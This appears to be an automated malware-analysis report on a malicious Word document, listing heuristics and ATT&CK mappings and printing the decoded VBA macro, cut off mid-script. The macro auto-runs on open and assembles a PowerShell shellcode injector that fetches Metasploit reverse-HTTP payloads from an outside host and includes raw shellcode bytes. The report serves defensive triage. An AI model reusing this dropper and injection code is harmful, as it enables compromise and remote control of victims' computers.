MALICIOUS
666
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that execute PowerShell commands, indicative of a downloader or dropper. The macros utilize WMI to launch processes and appear to be designed to download and execute a second-stage payload. The presence of VirtualAlloc and WriteProcessMemory API calls suggests the payload may involve shellcode execution.
Heuristics 18
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
ClamAV: Doc.Dropper.Donoff-5743532-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
[Sy" e = e + "stem.Runtime.InteropServices.Marshal]::Copy($Shell" e = e + "code, 0, $BaseAddress, $Shellcode.Length)" -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
" e = e + " if ((!$IsWow64) -and $PowerShell32bit)" " -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() pVh -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() pVh -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Customizable = True Sub Auto_Open() pVh -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31213 bytes |
SHA-256: 86ff6884a672f145df1211592361273555e6bfd9bb22854baec2f8a114c5fc20 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
pVh
End Sub
Sub AutoOpen()
pVh
End Sub
Sub Document_Open()
pVh
End Sub
Public Function pVh() As Variant
Dim e As String
e = "function Invoke-Shellcode"
{
[CmdletBinding( Defa"
e = e + "ultParameterSetName = 'RunLocal', SupportsShouldPr"
e = e + "ocess = $True , ConfirmImpact = 'High')] Param ("
"
e = e + " [ValidateNotNullOrEmpty()]"
[UInt16]
"
e = e + "$ProcessID,"
[Parameter( ParameterSetName = 'R"
e = e + "unLocal' )]"
[ValidateNotNullOrEmpty()]
["
e = e + "Byte[]]"
$Shellcode,
[Parameter( Paramete"
e = e + "rSetName = 'Metasploit' )]"
[ValidateSet( 'win"
e = e + "dows/meterpreter/reverse_http',"
"
e = e + " 'windows/meterpreter/reverse_https',"
"
e = e + " IgnoreCase = $True )]"
[String]
$P"
e = e + "ayload = 'windows/meterpreter/reverse_http',"
"
e = e + "[Parameter( ParameterSetName = 'ListPayloads' )]"
"
e = e + " [Switch]"
$ListMetasploitPayloads,
[P"
e = e + "arameter( Mandatory = $True,"
Para ""
e = e + "meterSetName = 'Metasploit' )]"
[ValidateNotNu"
e = e + "llOrEmpty()]"
[String]
$Lhost = '127.0.0."
e = e + "1',"
[Parameter( Mandatory = $True,
"
e = e + " ParameterSetName = 'Metasploit' )]"
[Va"
e = e + "lidateRange( 1,65535 )]"
[Int]
$Lport = 8"
e = e + "443,"
[Parameter( ParameterSetName = 'Metasplo"
e = e + "it' )]"
[ValidateNotNull()]
[String]
"
e = e + " $UserAgent = (Get-ItemProperty -Path 'HKCU:\Softw"
e = e + "are\Microsoft\Windows\CurrentVersion\Internet Sett"
e = e + "ings').'User Agent',"
[Parameter( ParameterSet"
e = e + "Name = 'Metasploit' )]"
[ValidateNotNull()]
"
e = e + " [Switch]"
$Legacy = $False,
[Parameter"
e = e + "( ParameterSetName = 'Metasploit' )]"
[Validat"
e = e + "eNotNull()]"
[Switch]
$Proxy = $False,
"
e = e + " [Switch]"
$Force = $False
)
Set-Stric"
e = e + "tMode -Version 2.0"
if ($PsCmdlet.ParameterSet"
e = e + "Name -eq 'ListPayloads')"
{
$Availabl"
e = e + "ePayloads = (Get-Command Invoke-Shellcode).Paramet"
e = e + "ers['Payload'].Attributes |"
Where-Obj"
e = e + "ect {$_.TypeId -eq [System.Management.Automation.V"
e = e + "alidateSetAttribute]}"
foreach ($Payload i"
e = e + "n $AvailablePayloads.ValidValues)"
{
"
e = e + " New-Object PSObject -Property @{ Payloads "
e = e + "= $Payload }"
}
Return
}
"
e = e + " if ( $PSBoundParameters['ProcessID'] )"
{
"
e = e + " Get-Process -Id $ProcessID -ErrorAction Sto"
e = e + "p | Out-Null"
}
function Local:Get-Delega"
e = e + "teType"
{
Param
(
"
e = e + " [OutputType([Type])]"
[Parameter( P"
e = e + "osition = 0)]"
[Type[]]
$"
e = e + "Parameters = (New-Object Type[](0)),"
"
e = e + "[Parameter( Position = 1 )]"
[Type]
"
e = e + " $ReturnType = [Void]"
)
"
e = e + " $Domain = [AppDomain]::CurrentDomain"
$D"
e = e + "ynAssembly = New-Object System.Reflection.Assembly"
e = e + "Name('ReflectedDelegate')"
$AssemblyBuilde"
e = e + "r = $Domain.DefineDynamicAssembly($DynAssembly, [S"
e = e + "ystem.Reflection.Emit.AssemblyBuilderAccess]::Run)"
e = e + ""
$ModuleBuilder = $AssemblyBuilder.Define"
e = e + "DynamicModule('InMemoryModule', $false)"
$"
e = e + "TypeBuilder = $ModuleBuilder.DefineType('MyDelegat"
e = e + "eType', 'Class, Public, Sealed, AnsiClass, AutoCla"
e = e + "ss', [System.MulticastDelegate])"
$Constru"
e = e + "ctorBuilder = $TypeBuilder.DefineConstructor('RTSp"
e = e + "ecialName, HideBySig, Public', [System.Reflection."
e = e + "CallingConventions]::Standard, $Parameters)"
"
e = e + " $ConstructorBuilder.SetImplementationFlags('Run"
e = e + "time, Managed')"
$MethodBuilder = $TypeBui"
e = e + "lder.DefineMethod('Invoke', 'Public, HideBySig, Ne"
e = e + "wSlot, Virtual', $ReturnType, $Parameters)"
"
e = e + " $MethodBuilder.SetImplementationFlags('Runtime, "
e = e + "Managed')"
Write-Output $TypeBuilder.Creat"
e = e + "eType()"
}
function Local:Get-ProcAddress"
e = e + ""
{
Param
(
[Ou"
e = e + "tputType([IntPtr])]"
[Parameter( Posit"
e = e + "ion = 0, Mandatory = $True )]"
[String"
e = e + "]"
$Module,
[Parameter( P"
e = e + "osition = 1, Mandatory = $True )]"
[St"
e = e + "ring]"
$Procedure
)
"
e = e + "$SystemAssembly = [AppDomain]::CurrentDomain.GetAs"
e = e + "semblies() |"
Where-Object { $_.Global"
e = e + "AssemblyCache -And $_.Location.Split('\\')[-1].Equ"
e = e + "als('System.dll') }"
$UnsafeNativeMethods "
e = e + "= $SystemAssembly.GetType('Microsoft.Win32.UnsafeN"
e = e + "ativeMethods')"
$GetModuleHandle = $Unsafe"
e = e + "NativeMethods.GetMethod('GetModuleHandle')"
"
e = e + " $GetProcAddress = $UnsafeNativeMethods.GetMethod"
e = e + "('GetProcAddress')"
$Kern32Handle = $GetMo"
e = e + "duleHandle.Invoke($null, @($Module))"
$tmp"
e = e + "Ptr = New-Object IntPtr"
$HandleRef = New-"
e = e + "Object System.Runtime.InteropServices.HandleRef($t"
e = e + "mpPtr, $Kern32Handle)"
Write-Output $GetPr"
e = e + "ocAddress.Invoke($null, @([System.Runtime.InteropS"
e = e + "ervices.HandleRef]$HandleRef, $Procedure))"
}
"
e = e + ""
function Local:Emit-CallThreadStub ([IntPtr] "
e = e + "$BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Archit"
e = e + "ecture)"
{
$IntSizePtr = $Architectur"
e = e + "e / 8"
function Local:ConvertTo-LittleEndi"
e = e + "an ([IntPtr] $Address)"
{
$Li"
e = e + "ttleEndianByteArray = New-Object Byte[](0)"
"
e = e + " $Address.ToString("X$($IntSizePtr*2)") -spli"
e = e + "t '([A-F0-9]{2})' | ForEach-Object { if ($_) { $Li"
e = e + "ttleEndianByteArray += [Byte] ('0x{0}' -f $_) } }"
"
e = e + ""
[System.Array]::Reverse($LittleEndian"
e = e + "ByteArray)"
Write-Output $LittleEndian"
e = e + "ByteArray"
}
$CallStub = New-Obje"
e = e + "ct Byte[](0)"
if ($IntSizePtr -eq 8)
"
e = e + " {"
[Byte[]] $CallStub = 0x48,0xB8 "
e = e + " # MOV QWORD RAX, &shellcode"
e = e + ""
$CallStub += ConvertTo-LittleEndian "
e = e + "$BaseAddr # &shellcode"
$CallStu"
e = e + "b += 0xFF,0xD0 # CALL"
e = e + " RAX"
$CallStub += 0x6A,0x00 "
e = e + " # PUSH BYTE 0"
$"
e = e + "CallStub += 0x48,0xB8 "
e = e + " # MOV QWORD RAX, &ExitThread"
$Call"
e = e + "Stub += ConvertTo-LittleEndian $ExitThreadAddr # &"
e = e + "ExitThread"
$CallStub += 0xFF,0xD0 "
e = e + " # CALL RAX"
}
"
e = e + " else"
{
[Byte[]] $Cal"
e = e + "lStub = 0xB8 # MOV DWO"
e = e + "RD EAX, &shellcode"
$CallStub += Conve"
e = e + "rtTo-LittleEndian $BaseAddr # &shellcode"
"
e = e + " $CallStub += 0xFF,0xD0 "
e = e + " # CALL EAX"
$CallStub += "
e = e + "0x6A,0x00 # PUSH BYT"
e = e + "E 0"
$CallStub += 0xB8 "
e = e + " # MOV DWORD EAX, &ExitThread"
"
e = e + ""
$CallStub += ConvertTo-LittleEndian $"
e = e + "ExitThreadAddr # &ExitThread"
$CallStu"
e = e + "b += 0xFF,0xD0 # CALL"
e = e + " EAX"
}
Write-Output $CallStub
"
e = e + " }"
function Local:Inject-RemoteShellcode ("
e = e + "[Int] $ProcessID)"
{
$hProcess = $Ope"
e = e + "nProcess.Invoke(0x001F0FFF, $false, $ProcessID) # "
e = e + "ProcessAccessFlags.All (0x001F0FFF)"
if (!"
e = e + "$hProcess)"
{
Throw "Unable t"
e = e + "o open a process handle for PID: $ProcessID"
"
e = e + " }"
$IsWow64 = $false
if ($64b"
e = e + "itCPU) # Only perform theses checks if CPU is 64-b"
e = e + "it"
{
$IsWow64Process.Invoke("
e = e + "$hProcess, [Ref] $IsWow64) | Out-Null"
"
e = e + " if ((!$IsWow64) -and $PowerShell32bit)"
"
e = e + " {"
Throw 'Unable to inject 64-b"
e = e + "it shellcode from within 32-bit Powershell. Use th"
e = e + "e 64-bit version of Powershell if you want this to"
e = e + " work.'"
}
elseif ($IsWow"
e = e + "64) # 32-bit Wow64 process"
{
"
e = e + " if ($Shellcode32.Length -eq 0)"
"
e = e + " {"
Throw 'No shellcode "
e = e + "was placed in the $Shellcode32 variable!'"
"
e = e + " }"
$Shellcode = $Shellcod"
e = e + "e32"
}
else # 64-bit proc"
e = e + "ess"
{
if ($Shellcode"
e = e + "64.Length -eq 0)"
{
"
e = e + " Throw 'No shellcode was placed in the $Shel"
e = e + "lcode64 variable!'"
}
"
e = e + " $Shellcode = $Shellcode64"
}
"
e = e + " }"
else # 32-bit CPU
{
"
e = e + " if ($Shellcode32.Length -eq 0)"
"
e = e + " {"
Throw 'No shellcode was place"
e = e + "d in the $Shellcode32 variable!'"
}
"
e = e + " $Shellcode = $Shellcode32"
}
"
e = e + " $RemoteMemAddr = $VirtualAllocEx.Invoke($hP"
e = e + "rocess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3"
e = e + "000, 0x40) # (Reserve|Commit, RWX)"
if (!$"
e = e + "RemoteMemAddr)"
{
Throw "Unab"
e = e + "le to allocate shellcode memory in PID: $ProcessID"
e = e + ""
}
$WriteProcessMemory.Invoke($"
e = e + "hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.L"
e = e + "ength, [Ref] 0) | Out-Null"
$ExitThreadAdd"
e = e + "r = Get-ProcAddress kernel32.dll ExitThread"
"
e = e + " if ($IsWow64)"
{
$CallStub"
e = e + " = Emit-CallThreadStub $RemoteMemAddr $ExitThreadA"
e = e + "ddr 32"
}
Else
{
"
e = e + " $CallStub = Emit-CallThreadStub $RemoteMemAd"
e = e + "dr $ExitThreadAddr 64"
}
$RemoteS"
e = e + "tubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPt"
e = e + "r]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reser"
e = e + "ve|Commit, RWX)"
if (!$RemoteStubAddr)
"
e = e + " {"
Throw "Unable to allocate thr"
e = e + "ead call stub memory in PID: $ProcessID"
"
e = e + "}"
$WriteProcessMemory.Invoke($hProcess, $"
e = e + "RemoteStubAddr, $CallStub, $CallStub.Length, [Ref]"
e = e + " 0) | Out-Null"
$ThreadHandle = $CreateRem"
e = e + "oteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $Re"
e = e + "moteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)"
"
e = e + " if (!$ThreadHandle)"
{
"
e = e + " Throw "Unable to launch remote thread in PID: $P"
e = e + "rocessID"
}
$CloseHandle.Invoke("
e = e + "$hProcess) | Out-Null"
}
function Local:I"
e = e + "nject-LocalShellcode"
{
if ($PowerShe"
e = e + "ll32bit) {"
if ($Shellcode32.Length -e"
e = e + "q 0)"
{
Throw 'No she"
e = e + "llcode was placed in the $Shellcode32 variable!'"
"
e = e + " return"
}
"
e = e + " $Shellcode = $Shellcode32"
}
els ""
e = e + "e"
{
if ($Shellcode64.Length "
e = e + "-eq 0)"
{
Throw 'No s"
e = e + "hellcode was placed in the $Shellcode64 variable!'"
e = e + ""
Return
}
"
e = e + " $Shellcode = $Shellcode64"
}
$"
e = e + "BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero,"
e = e + " $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|C"
e = e + "ommit, RWX)"
if (!$BaseAddress)
{"
e = e + ""
Throw "Unable to allocate shellcode "
e = e + "memory in PID: $ProcessID"
}
[Sy"
e = e + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
e = e + "code, 0, $BaseAddress, $Shellcode.Length)"
"
e = e + " $ExitThreadAddr = Get-ProcAddress kernel32.dll Ex"
e = e + "itThread"
if ($PowerShell32bit)
{"
e = e + ""
$CallStub = Emit-CallThreadStub $Bas"
e = e + "eAddress $ExitThreadAddr 32"
}
el ""
e = e + "se"
{
$CallStub = Emit-CallTh"
e = e + "readStub $BaseAddress $ExitThreadAddr 64"
"
e = e + "}"
$CallStubAddress = $VirtualAlloc.Invoke"
e = e + "([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x4"
e = e + "0) # (Reserve|Commit, RWX)"
if (!$CallStub"
e = e + "Address)"
{
Throw "Unable to "
e = e + "allocate thread call stub."
}
[S"
e = e + "ystem.Runtime.InteropServices.Marshal]::Copy($Call"
e = e + "Stub, 0, $CallStubAddress, $CallStub.Length)"
"
e = e + " $ThreadHandle = $CreateThread.Invoke([IntPtr]:"
e = e + ":Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntP"
e = e + "tr]::Zero)"
if (!$ThreadHandle)
{"
e = e + ""
Throw "Unable to launch thread."
"
e = e + " }"
$WaitForSingleObject.Invoke($Thre"
e = e + "adHandle, 0xFFFFFFFF) | Out-Null"
$Virtual"
e = e + "Free.Invoke($CallStubAddress, $CallStub.Length + 1"
e = e + ", 0x8000) | Out-Null # MEM_RELEASE (0x8000)"
"
e = e + " $VirtualFree.Invoke($BaseAddress, $Shellcode.Le"
e = e + "ngth + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000"
e = e + ")"
}
$IsWow64ProcessAddr = Get-ProcAddres"
e = e + "s kernel32.dll IsWow64Process"
if ($IsWow64Pro"
e = e + "cessAddr)"
{
$IsWow64ProcessDelegate "
e = e + "= Get-DelegateType @([IntPtr], [Bool].MakeByRefTyp"
e = e + "e()) ([Bool])"
$IsWow64Process = [System.R"
e = e + "untime.InteropServices.Marshal]::GetDelegateForFun"
e = e + "ctionPointer($IsWow64ProcessAddr, $IsWow64ProcessD"
e = e + "elegate)"
$64bitCPU = $true
}
el ""
e = e + "se"
{
$64bitCPU = $false
}
"
e = e + "if ([IntPtr]::Size -eq 4)"
{
$PowerSh"
e = e + "ell32bit = $true"
}
Else
{
"
e = e + "$PowerShell32bit = $false"
}
if ($PsCmdle"
e = e + "t.ParameterSetName -eq 'Metasploit')"
{
"
e = e + " if (!$PowerShell32bit) {"
$RootInvo"
e = e + "cation = $MyInvocation.Line"
$Response"
e = e + " = $True"
if ( $Force -or ( $Response "
e = e + "= $psCmdlet.ShouldContinue( "Do you want to launch"
e = e + " the payload from x86 Powershell?",
"
e = e + " "Attempt to execute 32-bit shellcode from 64"
e = e + "-bit Powershell. Note: This process takes about on"
e = e + "e minute. Be patient! You will also see some artif"
e = e + "acts of the script loading in the other process." "
e = e + ") ) ) { }"
if ( !$Response )
"
e = e + " {"
Return
}
"
e = e + " if ($MyInvocation.BoundParameters['Force']"
e = e + ")"
{
$Command = "func"
e = e + "tion $($MyInvocation.InvocationName) {`n" + $MyInv"
e = e + "ocation.MyCommand.ScriptBlock + "`n}`n$($RootInvoc"
e = e + "ation)`n`n"
}
Else
"
e = e + " {"
$Command = "function $("
e = e + "$MyInvocation.InvocationName) {`n" + $MyInvocation"
e = e + ".MyCommand.ScriptBlock + "`n}`n$($RootInvocation) "
e = e + "-Force`n`n"
}
$CommandBy"
e = e + "tes = [System.Text.Encoding]::Ascii.GetBytes($Comm"
e = e + "and)"
$EncodedCommand = [Convert]::ToB"
e = e + "ase64String($CommandBytes)"
$Execute ="
e = e + " '$Command' + " | $Env:windir\SysWOW64\WindowsPowe"
e = e + "rShell\v1.0\powershell.exe -NoProfile -Command -"
"
e = e + ""
Invoke-Expression -Command $Execute |"
e = e + " Out-Null"
Return
}
"
e = e + "$Response = $True"
if ( $Force -or ( $Resp"
e = e + "onse = $psCmdlet.ShouldContinue( "Do you know what"
e = e + " you're doing?",
"About to downloa"
e = e + "d Metasploit payload '$($Payload)' LHOST=$($Lhost)"
e = e + ", LPORT=$($Lport)" ) ) ) { }
if ( !$Respo"
e = e + "nse )"
{
Return
}
"
e = e + " switch ($Payload)"
{
'"
e = e + "windows/meterpreter/reverse_http'"
{
"
e = e + " $SSL = ''"
}
"
e = e + " 'windows/meterpreter/reverse_https'"
"
e = e + " {"
$SSL = 's'
"
e = e + "[System.Net.ServicePointManager]::ServerCertificat"
e = e + "eValidationCallback = {$True}"
}
"
e = e + " }"
if ($Legacy)
{
"
e = e + " $Request = "http$($SSL)://$($Lhost):$($Lport)/I"
e = e + "NITM"
} else {
$CharArray = "
e = e + "48..57 + 65..90 + 97..122 | ForEach-Object {[Char]"
e = e + "$_}"
$SumTest = $False
wh ""
e = e + "ile ($SumTest -eq $False) "
{
"
e = e + " $GeneratedUri = $CharArray | Get-Random -"
e = e + "Count 4"
$SumTest = (([int[]] $Gen"
e = e + "eratedUri | Measure-Object -Sum).Sum % 0x100 -eq 9"
e = e + "2)"
}
$RequestUri = -join"
e = e + " $GeneratedUri"
$Request = "http$($SSL"
e = e + ")://$($Lhost):$($Lport)/$($RequestUri)"
"
e = e + "}"
$Uri = New-Object Uri($Request)
"
e = e + " $WebClient = New-Object System.Net.WebClient"
"
e = e + " $WebClient.Headers.Add('user-agent', "$UserA"
e = e + "gent")
if ($Proxy)
{
"
e = e + " $WebProxyObject = New-Object System.Net.WebProxy"
e = e + ""
$ProxyAddress = (Get-ItemProperty -P"
e = e + "ath 'HKCU:\Software\Microsoft\Windows\CurrentVersi"
e = e + "on\Internet Settings').ProxyServer"
if"
e = e + " ($ProxyAddress) "
{
"
e = e + "$WebProxyObject.Address = $ProxyAddress"
"
e = e + " $WebProxyObject.UseDefaultCredentials = $Tr"
e = e + "ue"
$WebClientObject.Proxy = $WebP"
e = e + "roxyObject"
}
}
try
"
e = e + ""
{
[Byte[]] $Shellcode32 = $W"
e = e + "ebClient.DownloadData($Uri)"
}
ca ""
e = e + "tch"
{
Throw "$($Error[0].Exc"
e = e + "eption.InnerException.InnerException.Message)"
"
e = e + " }"
[Byte[]] $Shellcode64 = $Shellcod"
e = e + "e32"
}
elseif ($PSBoundParameters['Shellc"
e = e + "ode'])"
{
[Byte[]] $Shellcode32 = $Sh"
e = e + "ellcode"
[Byte[]] $Shellcode64 = $Shellcod"
e = e + "e32"
}
Else
{
[Byte[]] $She"
e = e + "llcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x"
e = e + "89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,"
"
e = e + " 0x52,0x0c,0x8b,0x52,0"
e = e + "x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0"
e = e + "x31,0xc0,"
0 xac , ""
e = e + "0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,"
e = e + "0xc7,0xe2,0xf0,0x52,0x57,"
"
e = e + " 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0"
e = e + ",0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,"
"
e = e + " 0xd0,0x50,0x8b,0x48,0x1"
e = e + "8,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x3"
e = e + "4,0x8b,"
0x01,0x"
e = e + "d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x"
e = e + "c7,0x38,0xe0,0x75,0xf4,"
"
e = e + " 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0"
e = e + "x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,"
"
e = e + " 0x0c,0x4b,0x8b,0x58,0x1c,"
e = e + "0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"
e = e + "0x24,"
0x5b,0x5b"
e = e + ",0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b"
e = e + ",0x12,0xeb,0x86,0x5d,"
"
e = e + " 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x5"
e = e + "0,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,"
"
e = e + " 0xbb,0xe0,0x1d,0x2a,0x0a,0x"
e = e + "68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x"
e = e + "0a,"
0x80,0xfb,0"
e = e + "xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0"
e = e + "x53,0xff,0xd5,0x63,"
"
e = e + " 0x61,0x6c,0x63,0x00)"
[Byte[]] $Shell"
e = e + "code64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00"
e = e + ",0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
"
e = e + " 0x56,0x48,0x31,0xd2,0x6"
e = e + "5,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8"
e = e + "b,0x52,"
0x20,0x"
e = e + "48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x"
e = e + "31,0xc9,0x48,0x31,0xc0,"
"
e = e + " 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0"
e = e + "xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,"
"
e = e + " 0x52,0x41,0x51,0x48,0x8b,"
e = e + "0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,"
e = e + "0x88,"
0x00,0x00"
e = e + ",0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50"
e = e + ",0x8b,0x48,0x18,0x44,"
"
e = e + " 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4"
e = e + "8,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,"
"
e = e + " 0x01,0xd6,0x4d,0x31,0xc9,0x"
e = e + "48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0x"
e = e + "c1,"
0x38,0xe0,0"
e = e + "x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0"
e = e + "x75,0xd8,0x58,0x44,"
"
e = e + " 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,"
e = e + "0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,"
"
e = e + " 0x01,0xd0,0x41,0x8b,0x04,0x88"
e = e + ",0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a"
e = e + ","
0x41,0x58,0x4"
e = e + "1,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xf"
e = e + "f,0xe0,0x58,0x41,"
"
e = e + " 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0x"
e = e + "ff,0x5d,0x48,0xba,0x01,0x00,0x00,"
"
e = e + " 0x00,0x00,0x00,0x00,0x00,0x48,0"
e = e + "x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,"
"
e = e + ""
0x6f,0x87,0xff,"
e = e + "0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,"
e = e + "0xbd,0x9d,0xff,"
"
e = e + " 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80"
e = e + ",0xfb,0xe0,0x75,0x05,0xbb,0x47,"
"
e = e + " 0x13,0x72,0x6f,0x6a,0x00,0x59,0x4"
e = e + "1,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)"
"
e = e + " }"
if ( $PSBoundParameters['ProcessID'] )
"
e = e + " {"
$OpenProcessAddr = Get-ProcAddress "
e = e + "kernel32.dll OpenProcess"
$OpenProcessDele"
e = e + "gate = Get-DelegateType @([UInt32], [Bool], [UInt3"
e = e + "2]) ([IntPtr])"
$OpenProcess = [System.Run"
e = e + "time.InteropServices.Marshal]::GetDelegateForFunct"
e = e + "ionPointer($OpenProcessAddr, $OpenProcessDelegate)"
e = e + ""
$VirtualAllocExAddr = Get-ProcAddress ke"
e = e + "rnel32.dll VirtualAllocEx"
$VirtualAllocEx"
e = e + "Delegate = Get-DelegateType @([IntPtr], [IntPtr], "
e = e + "[Uint32], [UInt32], [UInt32]) ([IntPtr])"
"
e = e + "$VirtualAllocEx = [System.Runtime.InteropServices."
e = e + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
e = e + "locExAddr, $VirtualAllocExDelegate)"
$Writ"
e = e + "eProcessMemoryAddr = Get-ProcAddress kernel32.dll "
e = e + "WriteProcessMemory"
$WriteProcessMemoryDel"
e = e + "egate = Get-DelegateType @([IntPtr], [IntPtr], [By"
e = e + "te[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]"
e = e + ")"
$WriteProcessMemory = [System.Runtime.I"
e = e + "nteropServices.Marshal]::GetDelegateForFunctionPoi"
e = e + "nter($WriteProcessMemoryAddr, $WriteProcessMemoryD"
e = e + "elegate)"
$CreateRemoteThreadAddr = Get-Pr"
e = e + "ocAddress kernel32.dll CreateRemoteThread"
"
e = e + " $CreateRemoteThreadDelegate = Get-DelegateType @("
e = e + "[IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], "
e = e + "[UInt32], [IntPtr]) ([IntPtr])"
$CreateRem"
e = e + "oteThread = [System.Runtime.InteropServices.Marsha"
e = e + "l]::GetDelegateForFunctionPointer($CreateRemoteThr"
e = e + "eadAddr, $CreateRemoteThreadDelegate)"
$Cl"
e = e + "oseHandleAddr = Get-ProcAddress kernel32.dll Close"
e = e + "Handle"
$CloseHandleDelegate = Get-Delegat"
e = e + "eType @([IntPtr]) ([Bool])"
$CloseHandle ="
